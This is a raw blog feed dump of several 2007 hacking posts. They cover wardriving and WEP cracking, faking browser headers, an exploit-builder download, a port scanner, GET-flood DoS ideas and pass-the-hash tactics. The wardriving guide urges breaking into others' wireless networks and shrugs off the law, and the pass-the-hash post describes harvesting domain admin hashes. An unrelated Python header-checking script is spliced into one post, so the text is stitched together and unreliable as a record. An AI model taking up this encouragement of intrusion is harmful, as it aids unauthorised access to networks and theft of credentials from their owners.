There is a version that allows you to deploy many Kismet sensors for distributed sniffing. Each "drone" sensor sends packets over a TCP connection to a Kismet server. Its output can be piped into Snort (http://www.snort.org) and some other Intrusion Detection Systems (IDS).&lt;br /&gt;&lt;br /&gt;You can get an idea of where easy-access Wi-Fi access points exist in abundance at http://www.WiFiMaps.com/ and http://www.wigle.net/maps. If you hunt on foot, keep an eye out for chalk marks on sidewalks or walls. These often denote Wi-Fi access points.&lt;br /&gt;&lt;br /&gt;If you would rather hunt while sitting in your hacker lab, you can get into WLANs that are tens of kilometers away by using a directional antenna. http://www.fab-corp.com/ is an example of a place where you can buy these.&lt;br /&gt;&lt;br /&gt;There are many commercial products for detecting WLANs. They are often used in companies that have problems with employees setting up unauthorized access points. For example, AirMagnet (http://www.airmagnet.com/) can run on the iPAQ PDA, and detects problems such as a Wi-Fi access point advertising its SSID.&lt;br /&gt;&lt;br /&gt;It is legal to detect WLANs, but not to use some of the wireless systems you may access. It is best to make sure a WLAN is open to the public before using it. However, unless it requires some sort of authentication to log on, law enforcement won’t waste time pursuing casual visitors to WLANs. If you do this and get busted anyhow, well, that’s the risk you take in any unauthorized computer access.&lt;br /&gt;&lt;br /&gt;Now we come to the slightly hard part. How do you break in if the WLAN asks for some sort of authentication? Wired Equivalent Privacy (WEP) is a common way to authenticate, and can be broken in minutes if you have a computer with a reasonably fast CPU. 
Since some Wi-Fi hardware is incompatible with better ways than WEP to authenticate, chances are you can find a lot of WEP nets floating around.&lt;br /&gt;&lt;br /&gt;Airsnort is an example of a program that cracks WEP keys. Once it has captured enough packets it can usually crack WEP in a second or so, if running on Linux with a reasonably fast CPU. Airsnort has varieties that run on BSD, Linux, OS X and Windows, and can be downloaded at http://airsnort.shmoo.com/.&lt;br /&gt;&lt;br /&gt;Now we come to the super hard part: WiFi Protected Access (WPA). It’s the latest, greatest way to keep intruders from abusing Wi-Fi. It can work, for example, with Windows Remote Authentication Dial-In Services to authenticate users – and keep the uninvited out. At this writing no technique has been publicized to break it. However, if by the time you read this, a way has been discovered, here are some web sites that are likely to offer downloads of the tools that do it, and instructions for their use.&lt;br /&gt;&lt;br /&gt;http://www.worldwidewardrive.org/&lt;br /&gt;&lt;br /&gt;http://www.wardriving.com/&lt;br /&gt;&lt;br /&gt;http://www.churchofwifi.com&lt;br /&gt;&lt;br /&gt;http://www.nakedwireless.ca/&lt;br /&gt;&lt;br /&gt;https://mailsrv.dis.org/mailman/listinfo/wardriving&lt;br /&gt;&lt;br /&gt;This Guide has been excerpted from the upcoming Second Edition of Überhacker! How to Break into Computers, by Carolyn Meinel. You are welcome to post this Guide to your web site or forward it to other people. 
Happy hacking!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-2751649791593930776?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/2751649791593930776/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=2751649791593930776' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2751649791593930776'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2751649791593930776'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/lanjacking-new-hacker-mecca.html' title='LANJacking: the New Hacker Mecca'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3518891373285628452</id><published>2007-12-13T06:45:00.000-08:00</published><updated>2007-12-13T06:49:27.415-08:00</updated><title type='text'>How to Fake out Web Servers</title><content type='html'>Did you know that most web browsers dutifully identify themselves to every web site you visit? There's often a good reason for this. Some web sites will send you pages customized to give you better viewing with the type of browser you use. Some sites use your header information to choose what language to display. 
Some intrusion detection techniques even look at headers to get an idea whether a connection to a website is being made by a legitimate browser or by a clumsily programmed attack.&lt;br /&gt;&lt;br /&gt;If it bugs you to tell web sites everything your browser wants to tell them, here's how to fake them out.&lt;br /&gt;&lt;br /&gt;Telnet! Yes, my favorite all-purpose mostly harmless hacking technique is telnet. If you use Windows and have never used telnet, type Start --&gt; Run --&gt; type telnet in the window and hit enter. This will give you a black window with something like this in it:&lt;br /&gt;&lt;br /&gt;Welcome to Microsoft Telnet Client.&lt;br /&gt;&lt;br /&gt;Escape character is 'CTRL+]'&lt;br /&gt;&lt;br /&gt;Microsoft Telnet&gt;&lt;br /&gt;&lt;br /&gt;Now here's a fun thing to do. At the telnet prompt, type "open happyhacker.org 80". Now wait a few seconds and then hold down the Ctrl key and the c key with one hand and hit enter with the other.&lt;br /&gt;&lt;br /&gt;This will give you something like:&lt;br /&gt;&lt;br /&gt;HTTP/1.0 408 Request Timeout&lt;br /&gt;Server: thttpd/2.20c 21nov01 on a Brickserver 2&lt;br /&gt;Content-type: text/html&lt;br /&gt;Date: Wed, 31 Jan 2007 13:23:03 GMT&lt;br /&gt;Last-modified: Wed, 31 Jan 2007 13:23:03 GMT&lt;br /&gt;Accept-Ranges: bytes&lt;br /&gt;Connection: close&lt;br /&gt;&lt;h2&gt;408 Request Timeout&lt;/h2&gt;&lt;br /&gt;No request appeared within a reasonable time period.&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;address&gt;&lt;a href="http://www.sage-inc.com/"&gt;&lt;br /&gt;thttpd/2.20c 21nov01 on a Brickserver 2&lt;/a&gt;&lt;/address&gt;&lt;br /&gt;&lt;br /&gt;Connection to host lost.&lt;br /&gt;&lt;br /&gt;To get something better, instead type Start --&gt; Run and enter "cmd". 
This gives an MS-DOS window that looks something like this:&lt;br /&gt;&lt;br /&gt;Microsoft Windows XP [Version 5.1.2600]&lt;br /&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;br /&gt;&lt;br /&gt;C:\Documents and Settings\Carolyn Meinel&gt;&lt;br /&gt;&lt;br /&gt;From here we can do something much more fun to unsuspecting webservers. Open Notepad and type this in two lines:&lt;br /&gt;&lt;br /&gt;telnet happyhacker.org 80&lt;br /&gt;GET /gtmhh/index.shtml&lt;br /&gt;&lt;br /&gt;It won't work unless you have this in two lines! Next copy these two lines and at the MS-DOS window prompt right click, choose paste, and then hit enter. This will display all the code that the webserver would normally send your browser.&lt;br /&gt;&lt;br /&gt;OK, so why is this a big deal? You can get the same code just by using the "page source" command on your browser. However, you got this code without having to send the webserver any extra headers. All you sent was the most basic web browser command, the "GET" command.&lt;br /&gt;&lt;br /&gt;Even more important...!!!&lt;br /&gt;&lt;br /&gt;You can go to jail warning: If you send a webserver a command that is designed to break into or crash it, you just might wind up being cellmate Spike's girlfriend. Yes, those nasty script kiddie websites offer exploits to send to webservers, and if you try them on about a thousand different websites you may eventually get unlucky and actually break in.&lt;br /&gt;&lt;br /&gt;If you want to try out all sorts of weird commands against a webserver without breaking the law, you have permission to do it against this website, happyhacker.org and you can't get into any trouble because I own it and I set the rules, which are, basically, you can do anything you want, see if you can crash happyhacker.org or break in, it's OK with me, muhahaha!&lt;br /&gt;&lt;br /&gt;Next, you can set up your web browser to send headers of your own design. 
This article by Eric Giguere is still useful for learning how to modify your browser's headers. He also has a link that displays a portion (not the entire thing) of your browser's headers. Using this link, I learn that my browser sent out this:&lt;br /&gt;&lt;br /&gt;connection keep-alive&lt;br /&gt;accept-language en-us,en;q=0.5&lt;br /&gt;content-length 0&lt;br /&gt;host www.ericgiguere.com&lt;br /&gt;accept text/xml,application/xml,application/xhtml+xml,&lt;br /&gt;text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5&lt;br /&gt;accept-charset ISO-8859-1,utf-8;q=0.7,*;q=0.7&lt;br /&gt;keep-alive 300&lt;br /&gt;cookie JSESSIONID=5CF0B8F73EB94ECA1D6AA324F2AA1ADC; __utma=13&lt;br /&gt;5980773.912983502.1170270059.1170270059.1170270059.1;&lt;br /&gt;__utmc=135980773;&lt;br /&gt;__utmz=135980773.1170270059.1.1.utmccn=(organic)&lt;br /&gt;utmcsr=googleutmctr=&lt;br /&gt;change+browser+headers+Firefoxutmcmd=organic&lt;br /&gt;user-agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;&lt;br /&gt;rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1&lt;br /&gt;You can tell this doesn't show everything because it doesn't include the "GET" command.&lt;br /&gt;&lt;br /&gt;Now let's say you would like to see absolutely everything your browser sends. You can do this by setting up a network sniffer on your own computer and using it to see everything that goes back and forth between your browser and a website. This can be especially interesting if you visit malicious websites, meaning those that try to break into your computer through your browser to install spyware and even worse Trojans that enable criminals to hide their nasty activities inside your computer. Check out http://www.winpcap.org/ to learn about sniffers and for free downloads of sniffer tools.&lt;br /&gt;&lt;br /&gt;Last but not least, you can see what your headers look like by installing the free &lt;a href="http://httpd.apache.org/"&gt;Apache webserver&lt;/a&gt; on your home computer. 
You can direct your browser to it by typing "localhost" or "127.0.0.1" into your browser or your telnet connection.&lt;br /&gt;&lt;br /&gt;In order to ensure that your Apache webserver saves the headers of your browser, you have to find the file named httpd.conf. Open it in Notepad and look for the line:&lt;br /&gt;&lt;br /&gt;CustomLog logs/agent.log agent&lt;br /&gt;&lt;br /&gt;If there is a "#" in front of it, this means Apache ignores it. If you delete the "#", Apache will record the headers of visiting browsers, but only after you restart Apache. Then after visiting it with your browser, you will find your headers in the agent.log file in the logs directory.&lt;br /&gt;&lt;br /&gt;Of course after reading all this, you may wonder what the big deal is about forging headers. Or maybe you think this is super fun, in which case you must be a real hacker.&lt;br /&gt;&lt;br /&gt;OK, so now let's go do fun stuff with the free Firefox browser. In the browser window type:&lt;br /&gt;&lt;br /&gt;about:config&lt;br /&gt;&lt;br /&gt;Scroll down the screen this displays to general.useragent.extra.firefox and double-click on this line. You can change it to whatever you want. I change it from Firefox/2.0.0.1 to Lynx. Yes, most of you are too young to remember Lynx, but I'm a really, really ancient hacker and back when the Web was young we didn't have pictures and all that newfangled fancy stuff. The web was just words and links, and Lynx, which we ran from a Unix shell account (this was before Linux even!) 
was how we crawled the web.&lt;br /&gt;&lt;br /&gt;Next I double-click on general.useragent.locale and change en-US (meaning I want to see websites in English if they offer that option) to en-Lower Slobovia.&lt;br /&gt;&lt;br /&gt;Oh, pooh, it turns out all this does is change one of my headers to:&lt;br /&gt;&lt;br /&gt;user-agent Mozilla/5.0 (Windows; U; Windows NT 5.1; Lower Slobovia; rv:1.8.1.1) Gecko/20061204 Lynx&lt;br /&gt;&lt;br /&gt;This failure to totally fubar the headers tells me we can have much more fun if we use telnet or even netcat to directly connect to webservers. Then we finally can really, really fake out anyone who actually reads the logs.&lt;br /&gt;&lt;br /&gt;You can get punched in the nose warning: Many intrusion detection and prevention systems look for really screwy browser headers. Make yours weird enough and you will make someone hopping mad -- and he or she might tell your online provider that you, yes you, sent evil headers. Yes, you can be tracked back to your home computer. If your online provider is terrified of hackers (could you actually be an evil, evil, criminal?) they might cancel your Internet service.&lt;br /&gt;&lt;br /&gt;But let's get back to that Firefox about:config screen. Have you ever tried to enter a really weird URL you found on a hacker website into your browser and it didn't do what you expected? Your browser might be the culprit. Check out:&lt;br /&gt;&lt;br /&gt;network.IDN.blacklist_chars&lt;br /&gt;&lt;br /&gt;It lists all the characters your browser ignores. Many of these aren't even on your keyboard, although you can create them with a hex editor. Some of them you can't send through telnet, either. The ultimate solution to all that is netcat, a telnet-like program that is also good for lots of amazing things. If you try really hard, netcat can enable you to do truly amazing "you can get punched in the nose" or "you can go to jail" stuff to webservers. 
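Added example, not code from the original post: the kind of User-Agent sanity check an intrusion detection system of the sort mentioned above could run over an Apache agent.log (the "agent" LogFormat writes one User-Agent per line). The accepted Gecko layout, the product list and the log lines are assumptions made for this example.

```python
"""Added example, not code from the original post: the sort of User-Agent sanity
check an IDS that looks for screwy browser headers could run over an Apache
agent.log (LogFormat "%{User-agent}i" agent, one UA per line).
The accepted Gecko layout, the product list and the log lines are assumptions."""
import re

# Gecko-era UA layout as the post shows it:
# Mozilla/5.0 (platform; U; OS; locale; rv:x.y) Gecko/YYYYMMDD Product/version
GECKO_UA = re.compile(
    r"^Mozilla/5\.0 \(([^;]+); U; ([^;]+); ([^;]+); rv:([\d.]+)\) "
    r"Gecko/(\d{8}) (\S+)$"
)
# Language tag such as en-US or de (assumed: lowercase language, dashed subtags)
LOCALE = re.compile(r"^[a-z]{2,3}(-[A-Za-z0-9]{2,8})*$")
# Products a Gecko build date is normally followed by (assumed list)
GECKO_PRODUCTS = ("Firefox/", "SeaMonkey/", "Thunderbird/")


def check_user_agent(ua):
    """Return the reasons a UA looks hand-edited; an empty list means plausible."""
    ua = ua.strip()
    if ua in ("", "-"):           # Apache logs "-" when the header was absent
        return ["missing user-agent"]
    reasons = []
    if any(ord(ch) not in range(32, 127) for ch in ua):
        reasons.append("non-printable or non-ASCII bytes in user-agent")
    if ua.startswith("Mozilla/"):
        m = GECKO_UA.match(ua)
        if m is None:
            reasons.append("Mozilla-style UA does not match a known layout")
        else:
            locale, product = m.group(3), m.group(6)
            if not LOCALE.match(locale):
                reasons.append("locale field is not a language tag: %r" % locale)
            if not product.startswith(GECKO_PRODUCTS):
                reasons.append("unexpected product after Gecko build: %r" % product)
    return reasons


def scan_agent_log(text):
    """Return (line_number, ua, reasons) for every log line that trips a check."""
    findings = []
    for n, ua in enumerate(text.splitlines(), 1):
        reasons = check_user_agent(ua)
        if reasons:
            findings.append((n, ua, reasons))
    return findings


# Constructed agent.log: a stock Firefox 2, the post's edited about:config UA,
# a request that carried no User-Agent header, and a genuine Lynx.
AGENT_LOG = """\
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; Lower Slobovia; rv:1.8.1.1) Gecko/20061204 Lynx
-
Lynx/2.8.5rel.1 libwww-FM/2.14
"""

if __name__ == "__main__":
    for n, ua, reasons in scan_agent_log(AGENT_LOG):
        print("line %d: %s" % (n, ua))
        for r in reasons:
            print("    " + r)
```

The genuine Lynx line passes because the check keys on the edited Gecko string, not on the product name alone.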
Your choice.&lt;br /&gt;&lt;br /&gt;Happy hacking!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3518891373285628452?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3518891373285628452/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3518891373285628452' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3518891373285628452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3518891373285628452'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/how-to-fake-out-web-servers.html' title='How to Fake out Web Servers'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-6178603945271371782</id><published>2007-12-13T06:42:00.000-08:00</published><updated>2007-12-13T06:43:00.327-08:00</updated><title type='text'></title><content type='html'>MSF eXploit Builder - Free Win32 Exploit Development Platform &lt;br /&gt;The MSF eXploit Builder (MSF-XB) is a free win32 application (GUI) that wants to be an Exploit Development Platform. 
The main goal is to speed up the exploit development process; this is accomplished by using the powerful functionality and neat design of the Metasploit Framework.&lt;br /&gt;&lt;br /&gt;MSF-XB automatically generates MSF-compliant exploit modules.&lt;br /&gt;&lt;br /&gt;The MSF-XB package also includes for your convenience:&lt;br /&gt;&lt;br /&gt;Fuzzers&lt;br /&gt;&lt;br /&gt;TAOF, The Art Of Fuzzing v0.3.2 &lt;br /&gt;ProxyFuzz v0.1, Rodrigo Marcos &lt;br /&gt;FileFuzz v1.0.2510.28439, iDefense &lt;br /&gt;FTPfuzz v1.0, Infigo &lt;br /&gt;WinFuzz v1.0.0.1, Fakehalo &lt;br /&gt;&lt;br /&gt;Handy Tools&lt;br /&gt;&lt;br /&gt;Findjmp2, Class101 &lt;br /&gt;branchseeker &lt;br /&gt;Faultmon &lt;br /&gt;mycrc &lt;br /&gt;Sysinternals (Microsoft) PStools &lt;br /&gt;wget.exe, GNU &lt;br /&gt;xCmd (remotexec clone) &lt;br /&gt;nc.exe &lt;br /&gt;A local database of opcodes/return addresses (Cross-platforms, 10 locales, fast and reverse queries) &lt;br /&gt;An ASCII table &lt;br /&gt;A lot of converters (Ascii, Hex, Byte, Unicode …) &lt;br /&gt;Malcode Analyst Pack v0.2 &lt;br /&gt;Process Stalker, iDefense &lt;br /&gt;&lt;br /&gt;REQUIREMENTS&lt;br /&gt;&lt;br /&gt;Please edit and customize the MSF-XB.INI file &lt;br /&gt;MSF-XB requires the Metasploit Framework to be installed to work properly (http://www.metasploit.com): Version 3 is recommended &lt;br /&gt;MSF-XB requires a debugger to be installed (Immunity Debugger) &lt;br /&gt;You can download MSF eXploit Builder here:&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.securinfos.info/metasploit/MSF-XB.EXE"&gt;MSF-XB.EXE (84Mb)&lt;/a&gt;&lt;br /&gt;MD5 41e83b8cb8d60d689bff191eb7842fc1&lt;br /&gt;SHA1 1cb0e457c9fa59da8f147a96afb9c1a056a4e655&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-6178603945271371782?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://hacking-guides.blogspot.com/feeds/6178603945271371782/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=6178603945271371782' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/6178603945271371782'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/6178603945271371782'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/msf-exploit-builder-free-win32-exploit.html' title=''/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-9145263396803695379</id><published>2007-12-13T06:40:00.000-08:00</published><updated>2007-12-13T06:41:22.412-08:00</updated><title type='text'>scanrand - Download Stateless TCP Scanner with Syn Cookies</title><content type='html'>scanrand - Download Stateless TCP Scanner with Syn Cookies &lt;br /&gt;Scanrand is an extremely quick and effective port scanner. It works by forking two distinct processes:&lt;br /&gt;&lt;br /&gt;One to send the initial queries &lt;br /&gt;One to receive responses and reconcile them with the above &lt;br /&gt;This makes it extremely fast.&lt;br /&gt;&lt;br /&gt;If you haven’t heard of the suite, Scanrand is one of the five tools in Paketto Keiretsu by Dan “Effugas” Kaminsky of Doxpara Research.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Scanrand implements numerous options; reasonable defaults are selected when no specific guidance is received from the user. 
The only thing mandated is a target destination, which may be specified using either an FQDN (Fully Qualified Domain Name) or a numeric specification.&lt;br /&gt;&lt;br /&gt;These numerics may employ any number of dashes, commas, or combination thereof at the same time. For example, scanrand 10.0.1-255.1-10,20:80,137-139 works fine.&lt;br /&gt;&lt;br /&gt;More ports will be scanned by default when scanning a single host than when scanning a network. Scanrand is able to estimate remote hopcount by examining incoming TTLs.&lt;br /&gt;&lt;br /&gt;Note: to install scanrand you first need to install the provided libnet, libtomcrypt and libpcap tarballs.&lt;br /&gt;&lt;br /&gt;It’s a good alternative to nmap for certain purposes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can read a good article on Scanrand here:&lt;br /&gt;&lt;br /&gt;Scanrand Dissected: A New Breed of Network Scanner&lt;br /&gt;&lt;br /&gt;The article includes nmap vs scanrand.&lt;br /&gt;&lt;br /&gt;You can download Scanrand here (as part of Paketto):&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.doxpara.com/paketto/paketto-1.10.tar.gz"&gt;paketto-1.10.tar.gz&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-9145263396803695379?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/9145263396803695379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=9145263396803695379' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/9145263396803695379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/9145263396803695379'/><link rel='alternate' 
type='text/html' href='http://hacking-guides.blogspot.com/2007/12/scanrand-download-stateless-tcp-scanner.html' title='scanrand - Download Stateless TCP Scanner with Syn Cookies'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-8788394832365457311</id><published>2007-12-13T06:36:00.000-08:00</published><updated>2007-12-13T06:39:34.150-08:00</updated><title type='text'>Serious flaws in players from microsoft and aol</title><content type='html'>It looks like there is a fairly serious vulnerability in some of the popular media player packages out in the wild, delivered as an MP4 file (due to the MP4 codec from 3ivx); it affects Windows Media Player 6.4 and Windows Media Player Classic, which are made by Microsoft, and AOL’s Winamp version 3.5.&lt;br /&gt;&lt;br /&gt;All the more reason to use VLC! This follows fairly shortly after a couple of quite serious vulnerabilities in Quicktime.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Security researchers are warning that popular media players offered by Microsoft and AOL are vulnerable to attacks that can completely compromise a user’s PC.&lt;br /&gt;&lt;br /&gt;Attack code has already been released for the bug, which has been confirmed in a codec used by older versions of Windows Media Player, made by Microsoft, and in AOL’s Winamp. A Symantec researcher has warned that users of other players may also be at risk because the vulnerability itself resides in a commonly used MP4 codec produced by a company called 3ivx Technologies.&lt;br /&gt;&lt;br /&gt;“The exploit works by supplying victims with a maliciously formed MP4 file,” Raymond Ball wrote for Symantec’s DeepSight Threat Management System. 
“When a victim unknowingly clicks a link that appears safe, the MP4 content is delivered, causing the exploit to run.”&lt;br /&gt;&lt;br /&gt;At least it’s not Microsoft’s fault this time, but they did use a dodgy codec so I guess some of the blame lies with them, right?&lt;br /&gt;&lt;br /&gt;They could have checked it out properly before bundling it into their software.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;A researcher who goes by the name SYS 49152 released exploit code here, here and here that targets Windows Media Player 6.4 and Windows Media Player Classic, which are made by Microsoft, and AOL’s Winamp version 3.5. Each uses the 3ivx MP4 codec, which is vulnerable to a stack overflow.&lt;br /&gt;&lt;br /&gt;Secunia describes the Windows Media Player vulnerabilities as “highly critical,” the second-highest rating on Secunia’s five-tier scale. The vulnerability reporting service didn’t have a rating for the Winamp vulnerability.&lt;br /&gt;&lt;br /&gt;No patch is available. Ball recommends users remove the codec or disable media players that use the MP4 codec until the hole is plugged. That strikes us as overkill. 
Taking care not to click on suspicious links in browsers and email programs should suffice.&lt;br /&gt;&lt;br /&gt;So watch out, attack vectors are getting more varied - don’t let your guard down during this merry season.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-8788394832365457311?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/8788394832365457311/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=8788394832365457311' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8788394832365457311'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8788394832365457311'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/serious-flaws-in-players-from-microsoft.html' title='Serious flaws in players from microsoft and aol'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3704633093762294283</id><published>2007-12-13T06:34:00.000-08:00</published><updated>2007-12-13T06:35:07.795-08:00</updated><title type='text'>Exaggerating timing attacks results via get flooding</title><content type='html'>I was thinking of an actually useful application for GET request flooding this evening. Normally we only think of GET requests as a binary thing - one at a time or flooding. 
But what if we only launched enough GET requests with the intention of impacting server load, not bandwidth latency? So picking the right URL would be critical here (DB impacts, most likely).&lt;br /&gt;&lt;br /&gt;When you found the right URL, launching a GET request flood against the server could seriously delay certain types of requests (especially if they must touch a database two times versus one time, for instance - if the DB was part of the flooding). Suddenly something that is normally the difference of a few microseconds could be the difference of seconds. Who cares? Because I’m always curious if there are any practical applications in hacking for DoS and this appears to be one of them - at least in theory.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3704633093762294283?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3704633093762294283/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3704633093762294283' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3704633093762294283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3704633093762294283'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/exaggerating-timing-attacks-results-via.html' title='Exaggerating timing attacks results via get flooding'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-4048485488197716751</id><published>2007-12-13T06:31:00.000-08:00</published><updated>2007-12-13T06:33:10.077-08:00</updated><title type='text'>Pass the hash, NTLM style</title><content type='html'>Pass the hash, NTLM style &lt;br /&gt;Way back in 1997, a Windows exploit named "NT Pass the Hash" was posted on Bugtraq. This Unix-based tool was a modified SMB client that lets you use captured LanMan hashes, without having to decrypt them first.&lt;br /&gt;&lt;br /&gt;After a mere ten years, someone has finally modernized this concept into a much more potent attack. Core Security has released &lt;a href="http://oss.coresecurity.com/projects/pshtoolkit.htm"&gt;Pass-The-Hash Toolkit&lt;/a&gt;, which runs on Windows and works with NTLM hashes. It consists of two key modules:&lt;br /&gt;&lt;br /&gt;IAM.EXE - This tool "injects" another user's NTLM credentials into your current Windows logon session, given their username, Windows domain, and NTLM hash. You can then use the 'net' tools or any other Windows software that authenticates via NTLM, all under the assumed privileges of the compromised user account.&lt;br /&gt;WHOSTHERE.EXE - Lists the usernames and NTLM hashes of all users logged on to a system. &lt;br /&gt;&lt;br /&gt;No password cracking required! So if you own other systems on the network, you can just run whosthere.exe on them until you snag a domain admin's hashes. Or you could use a man-in-the-middle attack, like the WPAD proxy exploit. 
As I discussed a few posts ago, the Metasploit guys covered several methods for grabbing NTLM hashes in their Tactical Exploitation presentation at BlackHat.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-4048485488197716751?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/4048485488197716751/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=4048485488197716751' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4048485488197716751'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4048485488197716751'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/pass-hash-ntlm-style.html' title='Pass the hash, NTLM style'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 